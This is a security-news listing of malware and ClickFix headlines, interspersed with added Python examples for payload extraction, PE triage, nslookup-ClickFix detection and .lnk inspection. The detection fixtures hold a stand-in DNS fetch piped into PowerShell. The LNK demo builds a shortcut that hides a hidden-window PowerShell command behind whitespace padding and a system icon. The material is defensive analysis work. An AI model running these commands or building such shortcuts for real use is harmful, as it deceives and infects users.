When generative AI (GenAI) hit the consumer market with the release of OpenAI’s ChatGPT, users worldwide flocked to the product and started experimenting with the tool’s capabilities across industries. The release also sent an instant panic through the hearts of information security professionals whose job is to protect organizations from risks, including the loss or…
Category: malware
AI, Global Security News, malware, Russia
Keenadu backdoor found preinstalled on Android devices, powers Ad fraud campaign
Kaspersky uncovered Keenadu, an Android backdoor used for ad fraud that can even take full control of devices. Kaspersky has identified a new Android malware called Keenadu. It can be preinstalled in device firmware, hidden inside system apps, or even distributed via official stores like Google Play. Currently used for ad fraud by turning infected…
AI, Exploits, Global Security News, malware
Tracking Malware Campaigns With Reused Material, (Wed, Feb 18th)
A few days ago I wrote a diary called “Malicious Script Delivering More Maliciousness”[1]. In the malware infection chain, there was a JPEG picture that embedded the last payload delimited with “BaseStart-” and “-BaseEnd” tags. Today, I discovered another campaign that relies on exactly the same technique. It started with an attachment called “TELERADIO_IB_OBYEKTLRIN_BURAXILIS_FORMASI.xIs” (SHA256:1bf3ec53ddd7399cdc1faf1f0796c5228adc438b6b7fa2513399cdc0cb865962).…
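To triage a carrier like the one described above, an analyst wants a quick extractor. The following is an added example, not the diary's own tooling: it scans a file for the “BaseStart-”/“-BaseEnd” delimiters, strips whitespace, base64-decodes what sits between them (the base64 encoding is an assumption; the diary only names the tags) and hashes the result. The JPEG skeleton it builds for the demo is constructed and is not the real sample.

```python
import base64
import binascii
import hashlib
import re

# Delimiters named in the diary; everything else below is assumed for the demo.
START_TAG = b"BaseStart-"
END_TAG = b"-BaseEnd"


def extract_tagged_payloads(blob: bytes, start: bytes = START_TAG, end: bytes = END_TAG) -> list:
    """Return every payload found between start/end tags, base64-decoded.

    Viewers stop at the JPEG EOI marker (FF D9), so bytes appended after it do not
    break the picture; we scan the whole file rather than trusting the marker.
    """
    payloads = []
    pos = 0
    while True:
        s = blob.find(start, pos)
        if s == -1:
            break
        e = blob.find(end, s + len(start))
        if e == -1:
            break  # unterminated block: not a usable payload
        chunk = re.sub(rb"\s+", b"", blob[s + len(start):e])  # tolerate wrapped lines
        try:
            payloads.append(base64.b64decode(chunk, validate=True))
        except binascii.Error:
            pass  # tags present but body is not base64: skip and keep scanning
        pos = e + len(end)
    return payloads


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_sample_carrier(payload: bytes) -> bytes:
    """Constructed stand-in for the malicious picture (not the real sample):
    a minimal JFIF header, a little image data, the EOI marker, then the tagged
    base64 payload wrapped at 64 columns."""
    soi = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    eoi = b"\xff\xd9"
    body = base64.b64encode(payload)
    wrapped = b"\n".join(body[i:i + 64] for i in range(0, len(body), 64))
    return soi + b"\x00" * 32 + eoi + START_TAG + wrapped + END_TAG


if __name__ == "__main__":
    fake_payload = b"MZ" + b"constructed fake payload, not the real one"
    for p in extract_tagged_payloads(build_sample_carrier(fake_payload)):
        print(f"{len(p)} bytes  sha256={sha256_hex(p)}")
```

Run it against the real picture with `extract_tagged_payloads(open(path, "rb").read())`; if the decode fails, the body between the tags is not base64 and the encoding assumption needs revisiting before the hash is compared with anything.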
AI, china, Exploits, Global Security News, malware
Notepad++ Fixes Hijacked Update Mechanism Used to Deliver Targeted Malware
Notepad++ has released a security fix to plug gaps that were exploited by an advanced threat actor from China to hijack the software update mechanism to selectively deliver malware to targets of interest. The version 8.9.2 update incorporates what maintainer Don Ho calls a “double lock” design that aims to make the update process “robust…
AI, APAC, Apps, china, Cybersecurity, Endpoint, Exploits, Global Security News, Government & Policy, malware, Network Security
Chinese hackers exploited a Dell zero-day for 18 months before anyone noticed
Researchers uncovered more worrying details about a long-running cyber espionage campaign suspected to be backed by the Chinese government, exemplifying how such attacks often go undetected until they’ve already caused significant damage. Google Threat Intelligence Group and Mandiant said the Chinese threat group UNC6201 has been exploiting a zero-day vulnerability in Dell RecoverPoint for Virtual…
AI, china, Global Security News, malware, Network Security
SmartLoader hackers clone Oura MCP project to spread StealC malware
Hackers used a fake Oura MCP server to trick users into downloading malware that installs the StealC info-stealer. Straiker’s AI Research (STAR) Labs team uncovered a SmartLoader campaign in which attackers cloned a legitimate MCP server linked to Oura Health to spread the StealC information stealer. The fake project appeared credible, complete with bogus forks…
AI, Apps, Data Breaches, Exploits, Global Security News, malware, Network Security, Risk Management
Infostealers Target OpenClaw AI Configuration Files
Infostealer malware is expanding beyond traditional browser and banking credential theft to target personal AI assistant environments. Researchers at Hudson Rock recently identified a live infection in which attackers exfiltrated a victim’s OpenClaw configuration files, including authentication tokens, cryptographic keys, and stored contextual data used by the AI agent. “While the malware may have been…
AI, Global Security News, malware
ClickFix Attack Abuses DNS Lookup Command to Deliver ModeloRAT
ClickFix campaigns have adapted to the latest defenses with a new technique to trick users into infecting their own machines with malware.
AI, Cloud Security, Cybersecurity, Endpoint, Global Security News, malware, Network Security, Risk Management
Palo Alto Networks’ Koi acquisition is all about keeping AI agents in check
Palo Alto Networks announced Tuesday its plans to buy security startup Koi, a deal aimed at addressing the security risks emerging as organizations rapidly adopt agentic AI. Terms were not disclosed, but Israeli business outlet Globes reported that Palo Alto will pay approximately $400 million. The deal is another among a trend of larger cybersecurity…
AI, Data Breaches, Global Security News, Government & Policy, malware, Network Security, Russia
Polish cybercrime Police arrest man linked to Phobos ransomware operation
Officers from Poland’s Central Bureau of Cybercrime Control (CBZC) police arrested a 47-year-old man linked to the Phobos ransomware operation. Polish authorities arrested a 47-year-old man suspected of involvement in cybercrime and linked him to the Phobos ransomware operation. Police said they discovered evidence of illegal activities on his seized devices. “Officers from the Central…
AI, Global Security News, malware
Malwarebytes brings Scam Guard to desktop with real-time scam protection
Malwarebytes has expanded the availability of its scam detection tool Scam Guard to desktop for both Windows and Mac. The free scam protection tool provides real-time feedback on scams, threats and malware alongside digital safety recommendations. Scams have become a global crisis, draining $442 billion from consumers over the past year, according to GASA’s Global…
AI, Apps, Global Security News, malware
New Keenadu backdoor found in Android firmware, Google Play apps
A newly discovered and sophisticated Android malware called Keenadu has been found embedded in firmware from multiple device brands, enabling it to compromise all installed applications and gain unrestricted control over infected devices. […]
AI, Global Security News, malware
Firmware-level Android backdoor found on tablets from multiple manufacturers
A new Android backdoor embedded directly in device firmware can quietly take control of apps and harvest data, Kaspersky researchers found. The malware, named Keenadu, was discovered during an investigation into earlier Android threats and appears to have been inserted during the firmware build process, not after devices reached users.  How the backdoor works…
AI, Apps, Exploits, Global Security News, malware
ZeroDayRAT spyware targets Android and iOS devices via commercial toolkit
A new cross-platform spyware sold openly through Telegram is lowering the barrier for hackers seeking remote access to mobile devices. Called “ZeroDayRAT” by its developer, the toolkit is being marketed through Telegram channels as a ready-to-deploy remote access solution. iVerify researchers traced its first activity to February 2, with the spyware being distributed as an…
AI, Data Breaches, Exploits, Global Security News, malware
South Korea slaps $25M fine on Dior, Louis Vuitton, Tiffany over Salesforce breach
South Korea fined Dior, Louis Vuitton, and Tiffany $25M after hackers breached their Salesforce systems, exposing customer data. South Korea’s Personal Information Protection Commission fined luxury brands including Dior, Louis Vuitton, and Tiffany & Co. a total of 36 billion Korean won ($25 million) after hackers compromised their Salesforce systems. The attack, linked to Scattered…
AI, Cybersecurity, Endpoint, Global Security News, malware, Network Security, privacy, Risk Management
LATAM Businesses Hit by XWorm via Fake Financial Receipts: Full Campaign Analysis
Malware campaigns targeting Latin America (LATAM) are evolving. While the final payloads, often commodity RATs like XWorm, remain consistent, delivery mechanisms are becoming increasingly sophisticated to bypass region-specific defenses and increase the chance of reaching real business users. In this analysis, we dissect a recent campaign targeting Brazilian users. What starts as a deceptive “banking receipt” quickly turns into a multi-stage…
AI, Cybersecurity, Exploits, Global Security News, malware, Risk Management
Hackers steal OpenClaw configuration in emerging AI agent threat
Researchers found an infostealer stole a victim’s OpenClaw configuration, marking a shift toward targeting personal AI agents. Cybersecurity researchers have uncovered a new information stealer that exfiltrated a victim’s OpenClaw configuration environment, previously known as Clawdbot and Moltbot. According to cybersecurity firm Hudson Rock, the case highlights a new shift in infostealer activity, moving beyond…
AI, Global Security News, malware
REMnux v8 brings AI integration to the Linux malware analysis toolkit
REMnux, a specialized Linux distribution for malware analysis, has released version 8 with a rebuilt platform based on Ubuntu 24.04 and a new capability aimed at connecting AI agents directly to its toolset. REMnux is designed for analyzing malicious software, phishing artifacts, suspicious documents, and related forensic data. The project includes more than 200 preconfigured…
AI, china, Cybersecurity, Data Breaches, Exploits, Global Security News, malware, Network Security, Risk Management
Fake Winter Olympics 2026 Stores Target Fans With Data-Theft Scams
As excitement builds at the Milano Cortina 2026 Winter Olympics, cybercriminals have launched convincing fake merchandise stores to steal payment details and personal data from eager fans. The campaign focuses heavily on high-demand mascot items that are sold out on the official site. In the “… past week alone, we’ve identified nearly 20 lookalike domains…
AI, Cloud Security, Data Breaches, Global Security News, malware, Risk Management
What CISOs should know about OpenClaw
Read about the security risk that using OpenClaw in companies brings with it. The new tool for orchestrating personal AI agents, called OpenClaw (formerly Clawdbot, then Moltbot), is currently enjoying great popularity. The open-source software can work autonomously and across devices, interact with online services and trigger workflows, so it is no wonder that the…
AI, Global Security News, malware
Infostealer malware found stealing OpenClaw secrets for first time
With the massive adoption of the OpenClaw agentic AI assistant, information-stealing malware has been spotted stealing files associated with the framework that contain API keys, authentication tokens, and other secrets. […]
AI, Compliance, Endpoint, Exploits, Global Security News, malware, Risk Management
CVE-2026-2441: Google Patches Chrome Zero-Day Exploited in the Wild
Right after Apple’s CVE-2026-20700 zero-day under active exploitation made headlines, Google released security updates for Chrome to address the first actively exploited Chrome zero-day of 2026. CVE-2026-2441 Analysis The high-severity flaw, tracked as CVE-2026-2441, is a use-after-free vulnerability in Chrome’s CSS component. NIST’s NVD description notes that the issue could allow a remote attacker to…
Global Security News, malware
OysterLoader Evolves With New C2 Infrastructure and Obfuscation
OysterLoader malware evolves into 2026, refining C2 infrastructure, obfuscation & infection stages
AI, Apps, Data Breaches, Endpoint, Exploits, Global Security News, malware, Network Security, Risk Management
ClickFix Campaign Uses Fake CAPTCHA Pages to Deliver StealC Malware on Windows
A new social engineering campaign is abusing fake CAPTCHA verification pages to trick Windows users into launching StealC information-stealing malware. The attack relies on compromised websites that display convincing Cloudflare-style security checks, prompting victims to manually execute malicious PowerShell commands under the guise of routine verification. “StealC exfiltrates browser credentials, cryptocurrency wallets, Steam accounts, Outlook…
AI, Global Security News, malware, Network Security
Microsoft alerts on DNS-based ClickFix variant delivering malware via nslookup
Microsoft warns of a new ClickFix variant that tricks users into running DNS commands to fetch malware via nslookup. Microsoft has revealed a new ClickFix variant that deceives users into running a malicious nslookup command through the Windows Run dialog to retrieve a second-stage payload via DNS. ClickFix typically uses fake CAPTCHA or error messages…
AI, Cybersecurity, Global Security News, malware
Google Ads and Claude AI Abused to Spread MacSync Malware via ClickFix
Cybersecurity experts at Moonlock Lab have discovered a new ClickFix attack. Hackers are using hijacked Google Ads and fake Claude AI guides to trick Mac users into installing the data-stealing MacSync malware.
AI, Global Security News, malware
2026 64-Bits Malware Trend, (Mon, Feb 16th)
In 2022 (time flies!), I wrote a diary about the 32-bit vs. 64-bit malware landscape[1]. It demonstrated that, despite the growing number of 64-bit computers, the “old architecture” remained the standard. In the SANS malware reversing training (FOR610[2]), we quickly cover the main differences between the two architectures. One of the conclusions is that 32-bit code is…
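The architecture split the diary tallies comes from one field in the PE file header. As an added example (not the diary's script), the Python below reads `IMAGE_FILE_HEADER.Machine` and the optional-header magic (PE32 vs PE32+) without any third-party parser, and counts a batch of samples by architecture. The header-only stubs it builds are constructed for the demo and will not execute.

```python
import struct

# IMAGE_FILE_HEADER.Machine values
MACHINES = {0x14C: "i386", 0x8664: "amd64", 0x1C0: "arm", 0xAA64: "arm64"}


def pe_architecture(data: bytes) -> dict:
    """Read the Machine field and the optional-header magic; raise on non-PE input."""
    if data[:2] != b"MZ" or len(data) < 0x40:
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0" or len(data) < e_lfanew + 26:
        raise ValueError("no PE signature")
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]       # IMAGE_FILE_HEADER.Machine
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]     # SizeOfOptionalHeader
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0] if opt_size >= 2 else None
    return {
        "machine": MACHINES.get(machine, f"0x{machine:x}"),
        "pe32plus": magic == 0x20B,               # 0x10b = PE32, 0x20b = PE32+
        "is_64bit": machine in (0x8664, 0xAA64),
    }


def tally(samples) -> dict:
    """Count samples by architecture; unparsable inputs land in 'invalid'."""
    counts = {}
    for blob in samples:
        try:
            key = pe_architecture(blob)["machine"]
        except ValueError:
            key = "invalid"
        counts[key] = counts.get(key, 0) + 1
    return counts


def make_stub_pe(machine: int, magic: int) -> bytes:
    """Constructed header-only PE for the demo (not a real sample)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)   # exactly 0x40 bytes
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader, Characteristics
    file_header = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0,
                              0xE0 if magic == 0x10B else 0xF0, 0x0102)
    return dos + b"PE\0\0" + file_header + struct.pack("<H", magic)


if __name__ == "__main__":
    batch = [make_stub_pe(0x14C, 0x10B), make_stub_pe(0x8664, 0x20B), b"\x7fELF"]
    print(tally(batch))
```

Machine and the PE32+ magic normally agree; a sample where they disagree is malformed or deliberately confusing and deserves a closer look before it goes into any statistic.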
AI, Apps, china, Compliance, Cybersecurity, Data Breaches, Endpoint, Exploits, Global Security News, malware, Network Security, Risk Management, Venture
10 years later, Bangladesh Bank cyberheist still offers cyber-resiliency lessons
Ten years on, the Bangladesh Bank cyberheist — a landmark cybersecurity incident that rewrote the rules of nation state–sponsored hacking — continues to offer lessons for the cybersecurity community. Cyberspies hacked into Bangladesh Bank’s internal network and SWIFT (Society for Worldwide Interbank Financial Telecommunication) messaging environment before sending 35 fraudulent SWIFT payment instructions that attempted…
AI, Global Security News, malware
New ClickFix attack abuses nslookup to retrieve PowerShell payload via DNS
Threat actors are now abusing DNS queries as part of ClickFix social engineering attacks to deliver malware, making this the first known use of DNS as a channel in these campaigns. […]
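The nslookup variant described here, in the Microsoft item above and in the earlier ModeloRAT item share one shape: nslookup started from the Run dialog (so its parent process is explorer.exe), a TXT-record query, and the answer handed to an interpreter. As an added example, not Microsoft's detection or any vendor's rule, the Python below scores constructed Sysmon-style process-creation records on those three traits. The record format, field names and sample command lines are assumptions made for the demo.

```python
import re

# Constructed Sysmon-style process-creation records (Event ID 1 fields; not taken
# from any published report). Tab-separated key=value pairs.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\nslookup.exe\tParentImage=C:\\Windows\\explorer.exe"
    "\tCommandLine=nslookup -q=txt lookup.example.invalid",
    "Image=C:\\Windows\\System32\\cmd.exe\tParentImage=C:\\Windows\\explorer.exe"
    "\tCommandLine=cmd /c nslookup -type=txt lookup.example.invalid | powershell -nop -",
    "Image=C:\\Windows\\System32\\nslookup.exe\tParentImage=C:\\Windows\\System32\\cmd.exe"
    "\tCommandLine=nslookup www.example.com",
    "Image=C:\\Windows\\System32\\nslookup.exe"
    "\tParentImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=nslookup -q=TXT _dmarc.example.com",
]

TXT_QUERY = re.compile(r"-(?:q|qt|type|querytype)=txt", re.I)
# a second interpreter after a pipe or && means the DNS answer is being executed
CHAINED_INTERPRETER = re.compile(r"(\||&&)\s*(powershell|pwsh|cmd|mshta|wscript|cscript)\b", re.I)


def parse_event(line: str) -> dict:
    return dict(field.split("=", 1) for field in line.split("\t"))


def score_event(ev: dict) -> list:
    """Return the reasons an event looks like the DNS/nslookup ClickFix pattern."""
    cmd = ev.get("CommandLine", "")
    parent = ev.get("ParentImage", "").lower()
    reasons = []
    if "nslookup" not in cmd.lower():
        return reasons
    if parent.endswith("\\explorer.exe"):
        reasons.append("launched from explorer.exe, i.e. typed or pasted into the Run dialog")
    if TXT_QUERY.search(cmd):
        reasons.append("TXT record query: DNS answer used as a data channel")
    if CHAINED_INTERPRETER.search(cmd):
        reasons.append("DNS answer piped into a script interpreter")
    return reasons


def is_clickfix_dns(ev: dict) -> bool:
    """A Run-dialog parent plus nslookup is enough on its own; otherwise require two
    traits, so an admin's TXT check from a shell does not fire."""
    reasons = score_event(ev)
    from_run_dialog = ev.get("ParentImage", "").lower().endswith("\\explorer.exe")
    return bool(reasons) and (from_run_dialog or len(reasons) >= 2)


def scan(lines) -> list:
    """Return (index, command line, reasons) for every record that matches."""
    hits = []
    for i, line in enumerate(lines):
        ev = parse_event(line)
        if is_clickfix_dns(ev):
            hits.append((i, ev["CommandLine"], score_event(ev)))
    return hits


if __name__ == "__main__":
    for idx, cmd, why in scan(SAMPLE_EVENTS):
        print(idx, cmd, "->", "; ".join(why))
```

Two artifacts worth pulling alongside the process events during triage: the Run dialog keeps its history under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, and Sysmon Event ID 22 records the DNS query itself, so the TXT lookup can be tied to the process even when the command line was obfuscated.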
AI, Cybersecurity, Global Security News, malware, Risk Management
Malicious npm and PyPI packages linked to Lazarus APT fake recruiter campaign
Researchers found malicious npm and PyPI packages tied to a fake recruitment campaign linked to North Korea’s Lazarus Group. ReversingLabs researcher uncovered new malicious packages on npm and PyPI connected to a fake job recruitment campaign attributed to the North Korea-linked Lazarus Group. The campaign uses deceptive hiring themes to trick developers into downloading infected…
AI, Global Security News, malware
CTM360: Lumma Stealer and Ninja Browser malware campaign abusing Google Groups
CTM360 reports 4,000+ malicious Google Groups and 3,500+ Google-hosted URLs used to spread the Lumma Stealer infostealing malware and a trojanized “Ninja Browser.” The report details how attackers abuse trusted Google services to steal credentials and maintain persistence across Windows and Linux systems. […]
AI, Global Security News, malware, Russia
SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 84
Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. This round covers:
Stan Ghouls targeting Russia and Uzbekistan with NetSupport RAT
Breaking Down ZeroDayRAT – New Spyware Targeting Android and iOS
Old-School IRC, New Victims: Inside the Newly Discovered SSHStalker Linux Botnet
Reynolds: Defense Evasion Capability…
AI, china, Cybersecurity, Data Breaches, Endpoint, Europe, Exploits, Global Security News, malware, Russia
Security Affairs newsletter Round 563 by Pierluigi Paganini – INTERNATIONAL EDITION
A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Headlines this round include:
Fintech firm Figure disclosed data breach after employee phishing attack
U.S. CISA adds a flaw in…
AI, Apps, Global Security News, Government & Policy, malware, Russia
Suspected Russian hackers deploy CANFAIL malware against Ukraine
A new alleged Russia-linked APT group targeted Ukrainian defense, government, and energy groups, with CANFAIL malware. Google Threat Intelligence Group identified a previously undocumented threat actor behind attacks on Ukrainian organizations using CANFAIL malware. The group is possibly linked to Russian intelligence services and has targeted defense, military, government, and energy entities at both regional…
AI, APAC, Exploits, Global Security News, malware, Network Security
New threat actor UAT-9921 deploys VoidLink against enterprise sectors
A new threat actor, UAT-9921, uses the modular VoidLink framework to target technology and financial organizations, Cisco Talos reports. Cisco Talos spotted a previously unknown threat actor, tracked as UAT-9921, using a new modular attack framework called VoidLink. The group targets organizations in the technology and financial services sectors. The flexible design of VoidLink suggests…
AI, Apps, Data Breaches, Endpoint, Global Security News, malware, Network Security, Risk Management, Russia
Malicious Chrome Extensions Hijack 500,000 VK Accounts in Stealth Campaign
More than 500,000 VKontakte users had their accounts silently manipulated by Chrome extensions that appeared to offer simple interface customization. Koi researchers found the extensions delivered multi-stage malware that forced group subscriptions, reset account settings, and interfered with VK’s security protections. Because “… the extensions update automatically, the attacker can push new malicious code to…
AI, Global Security News, malware
Claude LLM artifacts abused to push Mac infostealers in ClickFix attack
Threat actors are abusing Claude artifacts and Google Ads in ClickFix campaigns that deliver infostealer malware to macOS users searching for specific queries. […]
AI, Apps, Data Breaches, Endpoint, Exploits, Global Security News, Government & Policy, malware, Network Security
1,800+ Windows Servers Hit by BADIIS SEO Malware
More than 1,800 Windows servers have been quietly compromised in a sprawling malware campaign that turns legitimate websites into tools for search engine manipulation. The operation leverages a sophisticated strain known as BADIIS to infect Microsoft Internet Information Services (IIS) environments, allowing threat actors to monetize trusted infrastructure without disrupting normal operations. We found “……
AI, Data Breaches, Global Security News, malware, privacy
South Korea fines Louis Vuitton, Christian Dior, Tiffany $25M for SaaS security failures
South Korea’s data protection authority has handed down a combined KRW 36 billion (approximately US$25 million) in administrative fines to the local subsidiaries of three global luxury houses, after finding they failed to implement basic security controls while managing customer data through a SaaS platform. The Personal Information Protection Commission (PIPC), South Korea’s top privacy…
AI, Global Security News, Government & Policy, malware, Russia
Google Ties Suspected Russian Actor to CANFAIL Malware Attacks on Ukrainian Orgs
A previously undocumented threat actor has been attributed to attacks targeting Ukrainian organizations with malware known as CANFAIL. Google Threat Intelligence Group (GTIG) described the hack group as possibly affiliated with Russian intelligence services. The threat actor is assessed to have targeted defense, military, government, and energy organizations within the Ukrainian regional and
AI, Cybersecurity, Exploits, Global Security News, malware, Risk Management
Four new reasons why Windows LNK files cannot be trusted
The number of ways that Windows shortcut (.LNK) files can be abused just keeps growing: A cybersecurity researcher has documented four new techniques to trick Windows users into running malicious actions through innocent-looking shortcuts. Wietze Beukema demonstrated how to spoof the visible LNK destination, hide command-line arguments, and execute a different program than the one…
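The item above is about the gap between what a shortcut shows and what it runs. As an added example, not Beukema's research code or any of his four specific techniques, the Python below implements enough of the MS-SHLLINK layout to build a minimal .lnk, parse its StringData back out and flag the classic "what you see is not what runs" shapes: a long whitespace run or an over-long argument string (both push the real command out of the Properties dialog's visible target), an interpreter in the target, and a system icon dressing it up. The thresholds are assumptions, and the shortcuts built here are constructed for the demo.

```python
import re
import struct

# Layout from MS-SHLLINK: 76-byte ShellLinkHeader, optional IDList/LinkInfo, then
# StringData in a fixed order. Only what this demo needs is implemented.
LNK_CLSID = b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [  # (LinkFlags bit, name) in the order StringData is stored
    (0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
    (0x20, "arguments"), (0x40, "icon_location"),
]
INTERPRETERS = re.compile(r"\b(powershell|pwsh|cmd|mshta|rundll32|wscript|cscript|conhost)\b", re.I)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk (the parts Explorer renders for the user)."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C
    if flags & HAS_ID_LIST:          # IDListSize (2 bytes) + ItemIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:        # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        raw = data[pos:pos + (count * 2 if unicode else count)]
        pos += len(raw)
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252")
    return fields


def build_lnk(relative_path: str, arguments: str, icon_location: str = None) -> bytes:
    """Constructed minimal shortcut for the demo: header + StringData, UTF-16, no IDList."""
    flags = 0x08 | 0x20 | IS_UNICODE | (0x40 if icon_location else 0)
    # HeaderSize, CLSID, LinkFlags, FileAttributes(ARCHIVE), 3 FILETIMEs, FileSize,
    # IconIndex, ShowCommand(SW_SHOWNORMAL), HotKey, Reserved1..3
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)

    def field(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + field(relative_path) + field(arguments) + (field(icon_location) if icon_location else b"")


def inspect_lnk(data: bytes) -> list:
    """Heuristics for shortcuts that run something other than what they display."""
    f = parse_lnk(data)
    args = f.get("arguments", "")
    target = " ".join(filter(None, (f.get("relative_path"), f.get("working_dir"))))
    findings = []
    if re.search(r"\s{20,}", args):
        findings.append("long whitespace run in arguments: pushes the real command out of view")
    if len(args) > 260:   # assumed limit of what the Properties dialog shows
        findings.append("arguments exceed 260 characters: Properties dialog shows a truncated target")
    if INTERPRETERS.search(target + " " + args):
        findings.append("target or arguments invoke a script interpreter / LOLBin")
    icon = f.get("icon_location", "")
    if findings and icon and re.search(r"(shell32|imageres|\.ico)", icon, re.I):
        findings.append(f"system icon {icon!r} dresses up an interpreter shortcut")
    return findings


if __name__ == "__main__":
    evil = build_lnk("..\\..\\Windows\\System32\\cmd.exe",
                     "/c" + " " * 300 + "powershell -nop -w hidden -c calc",
                     icon_location="%SystemRoot%\\System32\\shell32.dll")
    for finding in inspect_lnk(evil):
        print("-", finding)
```

Real-world shortcuts usually carry an IDList and LinkInfo block before the strings; the parser skips both by their declared sizes, so it reads files produced by Windows as well as the stubs above. Because Explorer reads the same StringData, a finding here is something the user was never going to see.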
AI, china, Cybersecurity, Data Breaches, Exploits, Global Security News, Government & Policy, malware, Risk Management, Russia
Google fears massive attempt to clone Gemini AI through model extraction
Google detected and blocked a campaign involving more than 100,000 prompts that it claimed were designed to copy the proprietary reasoning capabilities of its Gemini AI model, according to a quarterly threat report released by Google Threat Intelligence Group. The prompts looked like a coordinated attempt to perform model extraction or distillation, a machine-learning process…
AI, china, Cybersecurity, Data Breaches, Exploits, Global Security News, Government & Policy, malware, Risk Management, Russia
Google: state-backed hackers exploit Gemini AI for cyber recon and attacks
Google says nation-state actors used Gemini AI for reconnaissance and attack support in cyber operations. Google DeepMind and GTIG report a rise in model extraction or “distillation” attacks aimed at stealing AI intellectual property, which Google has detected and blocked. While APT groups have not breached frontier models, private firms and researchers have tried to…
AI, Global Security News, malware
npm’s Update to Harden Their Supply Chain, and Points to Consider
In December 2025, in response to the Sha1-Hulud incident, npm completed a major authentication overhaul intended to reduce supply-chain attacks. While the overhaul is a solid step forward, the changes don’t make npm projects immune from supply-chain attacks. npm is still susceptible to malware attacks – here’s what you need to know for a safer…
AI, APT, china, Cybersecurity, Global Security News, Government & Policy, malware, Russia, Technology
Google finds state-sponsored hackers use AI at ‘all stages’ of attack cycle
A new report from Google found evidence that state-sponsored hacking groups have leveraged AI tool Gemini at nearly every stage of the cyber attack cycle. The research underscores how AI tools have matured in their cyber offensive capabilities, even as it doesn’t reveal novel or paradigm shifting uses of the technology. John Hultquist, chief analyst…
AI, Global Security News, malware
Booz Allen Announces General Availability of Vellox Reverser to Automate Malware Defense
The AI-powered product delivers expert-grade malware analysis and reverse engineering in minutes.
AI, Apps, Cybersecurity, Data Breaches, Endpoint, Exploits, Global Security News, malware, Network Security, News, Threats
macOS Infostealers Fuel Growing Cybercrime Market
For years, some Mac users believed their devices were largely insulated from the malware plaguing Windows environments. That perception is rapidly eroding. Flare researchers found a growing underground economy is now centered on macOS Infostealers — malware designed to extract browser credentials, Apple Keychain data, and cryptocurrency wallet seed phrases at scale. “I remember that…
AI, Cybercrime, Europe, Exploits, Global Security News, hacking, hacking news, information security news, malware, Uncategorized
LummaStealer activity spikes post-law enforcement disruption
Bitdefender reports a surge in LummaStealer activity, showing the MaaS infostealer rebounded after 2025 law enforcement disruption. Bitdefender observed renewed LummaStealer activity, proving the MaaS infostealer recovered after 2025 takedowns. Active since 2022, it relies on affiliates, social engineering, fake cracked software, and fake CAPTCHA “ClickFix” lures. CastleLoader plays a key role in spreading it.…
AI, Exploits, Global Security News, malware, Malware, Phishing, Security, Risk Management
Phishing campaign chains old Office flaw with fileless XWorm RAT to evade detection
Fortinet researchers have disclosed a new phishing campaign delivering the commercially available XWorm malware, chaining a years-old Microsoft Office vulnerability with fileless execution to escape detection. The campaign, which uses multi-themed phishing emails and a malicious Excel add-in, ultimately deploys the modular remote access trojan (RAT) capable of encrypted command-and-control (C2) and plugin-based expansion.…
AI, ANYRUN, Cybersecurity, Endpoint, Global Security News, malware, Risk Management
Fortune 500 Tech Enterprise Speeds up Triage and Response with ANY.RUN’s Solutions
In enterprise SaaS, unclear security decisions carry real cost. False positives disrupt customers, while missed threats expose the business. A Fortune 500 cloud provider addressed this risk by embedding ANY.RUN into SOC investigations, giving analysts the behavioral evidence needed to reduce escalations, improve triage confidence, and make proportionate response decisions at scale. Company Context and Security Scope The organization is a…
AI, CISO, Don't miss, features, Global Security News, Hot stuff, malware, News
When security decisions come too late, and attackers know it
In this Help Net Security interview, Chris O’Ferrell, CEO at CodeHunter, talks about why malware keeps succeeding, where attackers insert malicious code in the SDLC, and how CI/CD pipelines can become a quiet entry point. He also breaks down the difference between behavioral detection and behavioral intent analysis, and why explainable results matter for security teams.…
AI, Apps, china, Cloud Security, Cybersecurity, Data Breaches, Endpoint, Exploits, Global Security News, malware, Network Security, Risk Management
What CISOs need to know about the OpenClaw security nightmare
The new personal AI agent orchestration tool known as OpenClaw — formerly Clawdbot, then Moltbot — is a personal assistant that can do tasks for you without your personal supervision. It can operate across devices, interact with online services, trigger workflows — no wonder the Github repo has seen millions of visits and over 160,000…
AI, Apps, Cybersecurity, Exploits, Global Security News, malware
